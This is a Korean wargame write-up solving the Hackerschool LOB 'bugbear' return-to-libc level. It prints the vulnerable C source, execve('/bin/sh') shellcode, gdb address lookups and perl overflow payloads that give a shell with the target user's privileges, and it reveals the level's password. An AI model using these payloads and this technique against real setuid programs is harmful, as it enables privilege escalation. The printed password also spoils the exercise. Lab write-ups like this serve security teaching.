해커스쿨 LOB ( darkknight -> bugbear ) by ORANG

LOB_darkknight

[darkknight@localhost darkknight]$ bash2 [darkknight@localhost darkknight]$ ls bugbear  bugbear.c [darkknight@localhost darkknight]$ cat bugbear.c /*         The Lord of the BOF : The Fellowship of the BOF         - bugbear         - RTL1 */ #include <stdio.h> #include <stdlib.h> main(int argc, char *argv[]) { char buffer[40]; int i; if(argc < 2){ printf("argv error\n"); exit(0); } if(argv[1][47] == '\xbf') { printf("stack betrayed you!!\n"); exit(0); } strcpy(buffer, argv[1]); printf("%s\n", buffer); }

bash2 띄우고~ 소스를 보니 이번엔 RTL이네요

skeleton 이었나, 그 문제처럼 공유라이브러리를 응용해서 풀어보겠습니다.

[darkknight@localhost tmp]$ cat ORANG.c #include <stdio.h> void ORANG(void) { char shellcode[]="\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80 \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89 \xc2\xb0\x0b\xcd\x80"; (*(void(*)())shellcode)(); } [darkknight@localhost tmp]$ gcc ORANG.c -fPIC -shared -o ORANG [darkknight@localhost tmp]$ ls ORANG  ORANG.c  bugbear  bugbear.c [darkknight@localhost tmp]$ export LD_PRELOAD=“/home/darkknight/tmp/ORANG"

shellcode를 실행시켜주는 함수를 공유라이브러리에 올리고 확인해보면..

[darkknight@localhost tmp]$ gdb ./bugbear GNU gdb 19991004 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB.  Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... (gdb) b * main Breakpoint 1 at 0x8048430 (gdb) r Starting program: /home/darkknight/tmp/./bugbear Breakpoint 1, 0x8048430 in main () (gdb) p ORANG $1 = {<text variable, no debug info>} 0x40015780 <ORANG>

함수가 제대로 올려져 있음을 확인했습니다.

바로 공격해보면..

[darkknight@localhost tmp]$ ./bugbear `perl -e 'print "A"x44,"\x80\x57\x01\x40"'` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAW@ bash$ id uid=512(darkknight) gid=512(darkknight) groups=512(darkknight) bash$ exit exit [darkknight@localhost tmp]$ cd .. [darkknight@localhost darkknight]$ ./bugbear `perl -e 'print "A"x44,"\x80\x57\x01\x40"'` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAW@ Segmentation fault

카피본에서는 공격에 성공했지만, 원본에는 실패했습니다.

정확한 이유를 찾지못해..

그냥 정석적인 RTL로 풀어보겠습니다.

(gdb) b main Breakpoint 1 at 0x8048436 (gdb) r Starting program: /home/darkknight/tmp/bugbear Breakpoint 1, 0x8048436 in main () (gdb) p system $1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system> [darkknight@localhost tmp]$ export ORANG="/bin/sh" [darkknight@localhost tmp]$ cat getenv.c #include <stdio.h> int main(void) { printf("0x%x\n", getenv("ORANG")); } [darkknight@localhost tmp]$ export ORANG="/bin/sh" [darkknight@localhost tmp]$ ./getenv 0xbffffe37

system 함수는 0x40058ae0 에 존재하고, /bin/sh는 내부에서 찾는 것도 가능하지만

편하게 환경변수에 올렸습니다.

[darkknight@localhost darkknight]$ ./bugbear `perl -e 'print "A"x44,"\xe0\x8a\x05\x40","AAAA","\x35\xfe\xff\xbf","\x00\x00\x00\x00"'` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@AAAA5 sh: /sh: No such file or directory Segmentation fault [darkknight@localhost darkknight]$ ./bugbear `perl -e 'print "A"x44,"\xe0\x8a\x05\x40","AAAA","\x30\xfe\xff\xbf","\x00\x00\x00\x00"'` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@AAAA0 sh: =/bin/sh: Permission denied Segmentation fault [darkknight@localhost darkknight]$ ./bugbear `perl -e 'print "A"x44,"\xe0\x8a\x05\x40","AAAA","\x31\xfe\xff\xbf","\x00\x00\x00\x00"'` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@AAAA1 bash$ id uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) groups=512(darkknight) bash$ my-pass euid = 513 new divide

주소가 정확하지 않아서 조금씩 수정해가며 성공!!

RTL 기법에 대한 좋은글이 많아 RTL 관련 설명은 생략합니다.